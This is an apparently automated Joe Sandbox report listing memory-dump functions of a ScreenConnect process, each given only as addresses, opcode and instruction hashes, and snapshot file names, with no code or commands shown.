Instruction ID: e85073cb829a21b706bf56f9db9b45b7756cd71d2245b67da4e7728ad546481a
Opcode Fuzzy Hash: d9eb308d9357aa86d8fbb8856dc93c6d2ad3c232bd7f187aa9d1cd6381c0bdb3
Instruction Fuzzy Hash: 2D21FC70A017058FC728DF69D858A6AB7F1FF49314B108B2CD4A6876A4DB70EA46CF81

Function 00CC8C30 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7df38e5ea267726e1d7bade2924a471456a357c36a6f42be098bb14f0389b15e
Instruction ID: e1dc1ab7c6c9d6250becf33223252fd4bd978fa2cf79918b32cfffa582a612e5
Opcode Fuzzy Hash: 7df38e5ea267726e1d7bade2924a471456a357c36a6f42be098bb14f0389b15e
Instruction Fuzzy Hash: 6311B6357006055FEB14EB68DA5176EB7E6EFC4310F048928E505DB395DF70AE0987E1

Function 00CCF880 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08c55407106ee0e466ea5b2fcbc343a45289ffceaefcfb3bd732e827b7d9e5cb
Instruction ID: f0ec7089c51d37e28e76fe7ed73c9a7a38c5e88ceba6411e7815524a58828672
Opcode Fuzzy Hash: 08c55407106ee0e466ea5b2fcbc343a45289ffceaefcfb3bd732e827b7d9e5cb
Instruction Fuzzy Hash: 0D2107B6C00249DFCF10CF9AC844ADEBBF5FB48310F148429E968A7251C775A555DFA1

Function 00CCE1A8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d70914ed8cbcbb2dc99ef9b21510fc4d13445e164bf17d7a8a2ffb23d4d4349
Instruction ID: a107713740be5f23a483aab7aec85c3506680844269ea46ec507b2e8e8e9532f
Opcode Fuzzy Hash: 0d70914ed8cbcbb2dc99ef9b21510fc4d13445e164bf17d7a8a2ffb23d4d4349
Instruction Fuzzy Hash: 7C114F71B002099FCB14DBA8DD419AEBBF5EFC9314B508639E529AB355DB30ED058BD0

Function 00CC329C Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1df1766e7d07ec6b07b01d8d3b27f6af20f507eb60c0ac8ee50006f7374c1499
Instruction ID: 1a1f6f2ea9e27baf14cf8d5dfcf85766e3e62a2db6f856dd66c4eecdcbe20426
Opcode Fuzzy Hash: 1df1766e7d07ec6b07b01d8d3b27f6af20f507eb60c0ac8ee50006f7374c1499
Instruction Fuzzy Hash: DC11DF71904284CFDB05DBB8E84569CBFF0EF81340F5885EED0029B652DB38AB88DB51

Function 00CC8AA0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dbcd716cb9c89197edf2cc414e1a943257c6a02774efcc6d2c41b6454096a2a
Instruction ID: 92330446be31f687e199b1ab470f983d068245921aaaa6240392f0760ce80e14
Opcode Fuzzy Hash: 6dbcd716cb9c89197edf2cc414e1a943257c6a02774efcc6d2c41b6454096a2a
Instruction Fuzzy Hash: E511663590025ADFCF01DFA4C9405DEBBF5EF4A300B1041A5E904FF265E735AA0ACB91

Function 05630040 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3562451330.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5630000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8352bce42be5b2df3f210807a5451bef883a21435d270b0ab4efe529b92dcbd
Instruction ID: 6ecfb3ba90f8179c51b4ccae80ebea781411cc101d76ea0467a62fda62210ac8
Opcode Fuzzy Hash: f8352bce42be5b2df3f210807a5451bef883a21435d270b0ab4efe529b92dcbd
Instruction Fuzzy Hash: 32112B327093545FC7215B2DC84894E7FA9EF8666030540EBF508CB362DA60DC04C7D1

Function 00CC0ECF Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c40d3c50e4e1682a295bbbbf15e24a2511844c3763afd4ae1282937d7ab7839
Instruction ID: f60143fccdc71b315bb72453ac1eb38ddf2ea244cdda437491a755564be9dba8
Opcode Fuzzy Hash: 8c40d3c50e4e1682a295bbbbf15e24a2511844c3763afd4ae1282937d7ab7839
Instruction Fuzzy Hash: 0701285248FBD0CFC7138B75D865AD13F20A9637563290ADFC4C58F6A7D101844BE322

Function 00CCFA72 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41ec9f0f2de47ee0c0b7f3de4d5c98d88eb7475a928647276351532d2970108c
Instruction ID: 2c1953bbf380cf9dd6eb34b27f265468a8b362a2d910834c77ea12deb23277d0
Opcode Fuzzy Hash: 41ec9f0f2de47ee0c0b7f3de4d5c98d88eb7475a928647276351532d2970108c
Instruction Fuzzy Hash: 2301A1763441108F8704DB69E8909AEB7A6FBD8325328847BE509C7361CA32EC139764

Function 00CC87A9 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 577f6ea6a781b3d6e3874d1ef42322a8b4b6bb05fd1bc34022ad1a06b6b29da8
Instruction ID: 793a661f1af894318d4fd05aa862591bc8565a5f7c366fa387f39957bdef2597
Opcode Fuzzy Hash: 577f6ea6a781b3d6e3874d1ef42322a8b4b6bb05fd1bc34022ad1a06b6b29da8
Instruction Fuzzy Hash: 9F112C315047408FCB22CB69D840AD6BFB0EF85321B3885FED095CB156E731994ACB51

Function 00CC91A8 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dc0ecedc74af1a243972e08786b6e2202c1f45beaf3bd4e2478ad5c93dc576d
Instruction ID: dcb3c03a041deb5d9e54f899f948276cd282be748951c02e37371a879c729f30
Opcode Fuzzy Hash: 6dc0ecedc74af1a243972e08786b6e2202c1f45beaf3bd4e2478ad5c93dc576d
Instruction Fuzzy Hash: 36110271E40245AFDB11CF69C800AEABBF6EFC5310F14C4AAE490DB254E3718E02CB92

Function 00A4D683 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547240835.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a4d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 2f932a01f3262bb974ebd7eefac963d32a7ab82939a74d151dec08e542e297ec
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: C211D07A504280CFCB16CF10D9C4B16BF72FB94324F24C6A9D8090B656C33AD85ACBA2

Function 00CC4E44 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5849c7794db9a3bf2de8984b233b69ea7dfafeb5172be67f753844e1ecd1993
Instruction ID: f062a908d9211583d877ff91a95488b01850d59f697ba47cc42a63920f58bd0f
Opcode Fuzzy Hash: c5849c7794db9a3bf2de8984b233b69ea7dfafeb5172be67f753844e1ecd1993
Instruction Fuzzy Hash: 182133B5C006498FCB10CF9AC844BEEFBF4EB48320F14842AD958A7211D378A585CFA5

Function 00CC91B8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 716ecdd60ed25eead87a1d3337f59f9bcc3b3ed582c314624b9a72af249e40a9
Instruction ID: 43c46b1cce4be591ef783abc08224a6fa1aa7d821ab72bd198ab858dd4b8583b
Opcode Fuzzy Hash: 716ecdd60ed25eead87a1d3337f59f9bcc3b3ed582c314624b9a72af249e40a9
Instruction Fuzzy Hash: 4E11A171E40205AFDB14CA69C804AABB7F6EFC4310F14C56EE554D7254E7719E02DB91

Function 00CCCBC0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb4c3286e99937d4c5f1b09691f6258878de73c6c4bb6e4b98d12f9a87c3ac1e
Instruction ID: 544dcdf883d13d4c9d3c8eb06167f04f6294871c57f150d3b4e31835d8c495c1
Opcode Fuzzy Hash: cb4c3286e99937d4c5f1b09691f6258878de73c6c4bb6e4b98d12f9a87c3ac1e
Instruction Fuzzy Hash: 4111E831A4021D9FDF14EBA8D964AEDBBB1AF89310F000469E009BB3B4DB785D44CBA1

Function 00CC8B95 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22bd8c75c067f4badbcdc77c674a313b5a7206163e9ef90f72287a9c7d81dd1b
Instruction ID: 0a69a3e98310f0dad8f3abf16750516d01766be8633372876d3b0e92eebfef37
Opcode Fuzzy Hash: 22bd8c75c067f4badbcdc77c674a313b5a7206163e9ef90f72287a9c7d81dd1b
Instruction Fuzzy Hash: B911493150005EDBCF00DFA8D9909DDBFB2FF85315B58C598E005AB129CB35AD8ACB60

Function 00CCCBB0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7024a6401fb4b3ad8bed684d5291b61e024e84c7e9722323bc4544ef2b0b4748
Instruction ID: 81791d797814c4e37d9cda259169979b663cc78c1c71fe25d7e3e4130303465b
Opcode Fuzzy Hash: 7024a6401fb4b3ad8bed684d5291b61e024e84c7e9722323bc4544ef2b0b4748
Instruction Fuzzy Hash: A1115E30E442198FDF14DBA8CDA5BEDBBB2AF88300F044469E005BB3A4DB785D45CBA1

Function 00CC8AB0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2da6054c34c59dc69e6e0572cbf3d33fae2450344ecd98afebb8d78b7c94a667
Instruction ID: 2ed6c26d2dbc44fbae7fb8acd984aaf88ec7c9c8c18086317e2cc78112efee8e
Opcode Fuzzy Hash: 2da6054c34c59dc69e6e0572cbf3d33fae2450344ecd98afebb8d78b7c94a667
Instruction Fuzzy Hash: 5411123690050ADFCF01DFA8D9409DEBBF5FF49314B108569EA05FB265E771AA0ACB90

Function 00CCA9C8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ed7ed0781caaedc1bc57cae5c746764067fc614f604ab13d9ed142eda0d89df
Instruction ID: 93c3581de417715c90994ef241ff6b51b03ae9a7495115b08d04ee59e9285b90
Opcode Fuzzy Hash: 6ed7ed0781caaedc1bc57cae5c746764067fc614f604ab13d9ed142eda0d89df
Instruction Fuzzy Hash: 7C01D671F012195F8B18DB59E80899BB7EDEBC43243148A7ED415DB305DBB1DD068BC0

Function 00A4D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547240835.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a4d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e8c0af2ca383323d686f04040246b640e034efb34c04b65a1d4a538ff560927
Instruction ID: 0006a0777cd02b9d8c68969187fd82722a231f86bcfadb1de1ca070f0f479b53
Opcode Fuzzy Hash: 9e8c0af2ca383323d686f04040246b640e034efb34c04b65a1d4a538ff560927
Instruction Fuzzy Hash: 8A01D675408340DAEB108B29CD84B67FFE8EFC5324F28C52AED4A5B286C279D845C6B1

Function 00CCECB1 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b39411d52ab7a3c564c8df290458f889cc35301c18de606e1ba4538fe4602ef3
Instruction ID: 890d05120bc4310eb385e08961c76387541b0f5390c1198663a8b50ead8632b0
Opcode Fuzzy Hash: b39411d52ab7a3c564c8df290458f889cc35301c18de606e1ba4538fe4602ef3
Instruction Fuzzy Hash: 09112E3090470ACFCB14DFA8C595EADBBB4EF46320F108A5EE415D72A1E7709681CB91

Function 00CCF9E0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea613c7de16ead62c24d2b64a2e13118f7a1c8a20d8085c4d608c44484a7d5d7
Instruction ID: 3336499cd40143375815153aca53d050df5a3037031d2f9f2144313d71c8e560
Opcode Fuzzy Hash: ea613c7de16ead62c24d2b64a2e13118f7a1c8a20d8085c4d608c44484a7d5d7
Instruction Fuzzy Hash: A4014C7134D7415FC317973AE860B0ABF99DF8131070480BFD058CB262DB60A8198B50

Function 00CCEB7E Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb7c474855e4fb126673b093a4c58f81fa4d8d801795badfafcccda3404462df
Instruction ID: deb4afa33689e456b3ce1f3c95624a7058ac0cff5f55cb5842c60109928ed57f
Opcode Fuzzy Hash: bb7c474855e4fb126673b093a4c58f81fa4d8d801795badfafcccda3404462df
Instruction Fuzzy Hash: 3FF04F367082555FC706CB1DD8A0DAABFA69F9621031980EBF848CB297DA30D902DB65

Function 00CCF630 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 758d9365c62cca75c3f94cfdeaf5a895913b6467b56c50ecdaad8ed61c462673
Instruction ID: 2797195ebee390181e2bcd7cb37cab4e7d455372a55b0e53d719020977ff8145
Opcode Fuzzy Hash: 758d9365c62cca75c3f94cfdeaf5a895913b6467b56c50ecdaad8ed61c462673
Instruction Fuzzy Hash: E9F0A4323052556FCF06DFAC9C509EE3BB7EFC8360704402AE509D7262CB31891297A1

Function 00CCBC60 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fefd02550d873fbffad03b3921ff2a903204a462f33e4e602c669d68d9c1243
Instruction ID: b1e46c4908432a0093228915f545804ca39663665de0d84f230647ee7e8f3879
Opcode Fuzzy Hash: 7fefd02550d873fbffad03b3921ff2a903204a462f33e4e602c669d68d9c1243
Instruction Fuzzy Hash: C001267254C2918FC702CBBCEC955C8FFA0EE92362B49049EC581CB102D738595BCB91

Function 05630148 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3562451330.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5630000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 652ebf8f804d90d70aa1ccf9591497a07d5fdaba4f272882feb5365ab0402bc2
Instruction ID: df98837e956123674a35aed1c7e9004bd751b724d64ab01f03f9fd3cffd407aa
Opcode Fuzzy Hash: 652ebf8f804d90d70aa1ccf9591497a07d5fdaba4f272882feb5365ab0402bc2
Instruction Fuzzy Hash: AA014B30E0020A8FCB48DFA8D559A7EBBF6BF44314F1085A9D40ADB361EB70D945CB81

Function 05630137 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3562451330.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5630000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a806c192640d239aa7b501226b5d98e12e5073121fc97f7cc82bc37c0919818
Instruction ID: 271f1f379e2b483e3e26e228c7e652cc3f46755501dc9619e364d2fb361d280b
Opcode Fuzzy Hash: 7a806c192640d239aa7b501226b5d98e12e5073121fc97f7cc82bc37c0919818
Instruction Fuzzy Hash: 4E011A70E0410A9FCB44DFA8D89AAAEBBF2FF04314F5441A9D409DB761E771D945CB81

Function 00CC8B40 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc80d03589a28cd5c24147a8cd44013357fa9a03dabfd6cf78fb78314de6c87c
Instruction ID: 4e71d27edf7acb58d15706c0f6c6980a004aa68fa8d491102d5ad547a79779e2
Opcode Fuzzy Hash: cc80d03589a28cd5c24147a8cd44013357fa9a03dabfd6cf78fb78314de6c87c
Instruction Fuzzy Hash: 8F012832D0055DEBCF04DFA9D9048CDBBB6EF89314F0585AAE505B7264DB306956CBA0

Function 00CCE260 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b29e0aff86bbc4523e0de78eb3cae4f44e5734735e5359c57cc3e786631f98c
Instruction ID: ddf0644f63ef4634851bd3180086bf03883072d404fefafaaad6dc15bcba42a8
Opcode Fuzzy Hash: 9b29e0aff86bbc4523e0de78eb3cae4f44e5734735e5359c57cc3e786631f98c
Instruction Fuzzy Hash: 7001C971E001259FCB41DFADDC516EDBBF1EF89254B288169D858EB351E3319A12CBC0

Function 00CCBCC8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7b47f91c50a233e5daa604f6c0b92669f08aa7aced85793fce2bf1bbfdd67ba
Instruction ID: 920adbd0c450358151813abddceeaaf119a86fe3f88cc64583c874ff0e37d796
Opcode Fuzzy Hash: f7b47f91c50a233e5daa604f6c0b92669f08aa7aced85793fce2bf1bbfdd67ba
Instruction Fuzzy Hash: 48F05836B092145ADB28CEBAA401A9BBBDACBD4624B14807FE59DC3640E931A8018765

Function 00A4D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547240835.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a4d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b59d3c9c8794e34e946372870c55647a50d4ac9ad98a13d7fa233bcd671f7b22
Instruction ID: 30729ff743311c7c76fa16a1dfba8c0eff5ce8b9b04da071a32a751cd803998e
Opcode Fuzzy Hash: b59d3c9c8794e34e946372870c55647a50d4ac9ad98a13d7fa233bcd671f7b22
Instruction Fuzzy Hash: 2CF06D71408344AEEB108B1AC884B62FFA8EB95724F18C55AED495F286C2799845CAB1

Function 00CCA9A1 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2efd2d65faccbd9aa65b841fdfc037d4efcdbf9a43cebfd8c2ad4cd7736c046
Instruction ID: 219b65ee234317643bcde54d74a63d0f89424cae88b19a61ffd4c7c97e1cfb23
Opcode Fuzzy Hash: d2efd2d65faccbd9aa65b841fdfc037d4efcdbf9a43cebfd8c2ad4cd7736c046
Instruction Fuzzy Hash: FAF02732A0E2D11FC31347799CA9AEA7FB4DE8312430D01EBD488CB283C6159C1AC7E0

Function 00CCFA08 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae08b3509dabbed20884da867000709e0b6b00be077f4e996202258a363f3cfb
Instruction ID: b5449033ffd1c5d08759c0b5d32af7af3ebd1702a6cc3baab7ebb73b29e423bb
Opcode Fuzzy Hash: ae08b3509dabbed20884da867000709e0b6b00be077f4e996202258a363f3cfb
Instruction Fuzzy Hash: 46F082B1744701AB8715A76BE850A5BBBDEDBC4750314843EE169CB314EF60EC064B90

Function 00CCAA48 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b85d3ef35950ab404b5ceeeb1f6a39856ebf508b7301238a6983c40585e5acb
Instruction ID: 0db003c27a1f123da81bb286675e7d5c6b79ae65bb8ee4a3ecf569e12f308dc9
Opcode Fuzzy Hash: 4b85d3ef35950ab404b5ceeeb1f6a39856ebf508b7301238a6983c40585e5acb
Instruction Fuzzy Hash: 9EF027313083505FCB056FEEA89851A7FE6EBCA66070805BDE149CB342CE208C068751

Function 00CC31E0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5a61d24474036655e719cd840728339df37c16ffa4c597dbe5183515ce09778
Instruction ID: c0a91b4093def7ff9705bf66727d9c32e9469ac1aea90e13bd4a4be47351a23b
Opcode Fuzzy Hash: f5a61d24474036655e719cd840728339df37c16ffa4c597dbe5183515ce09778
Instruction Fuzzy Hash: ACF03774905288DFCF45EFA8D58569CBFF0EB45340F2080EEC115AB652E7381B88CB12

Function 05630DFF Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3562451330.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5630000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4d6796b9969d974044caf6847cd76a6ec17e37940c29d56906b16d3297248f6
Instruction ID: 3d9d71769139ebe81b5f8deece8432e34b54265cb145ce12b713c3574437a1d6
Opcode Fuzzy Hash: a4d6796b9969d974044caf6847cd76a6ec17e37940c29d56906b16d3297248f6
Instruction Fuzzy Hash: 0DF09A3AB00218CBDF08EBA8D8509EE77B7EFC8250B104164E50ABB354CA326C028BD1

Function 00CCE618 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a396f4cf4bfb71bbb27fc6044ee2baee7e57423724d8392a973b1a55bb2da02
Instruction ID: 8c8239e01d814c7c897c0d2218ea92c7f47504592afa553bcd02f1f827c55cc7
Opcode Fuzzy Hash: 3a396f4cf4bfb71bbb27fc6044ee2baee7e57423724d8392a973b1a55bb2da02
Instruction Fuzzy Hash: AEF03A74A05209DFD704CB68CC95A59BBB5EF96300B1484AAE810DB291DB31EE22D790

Function 00CCBCBA Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
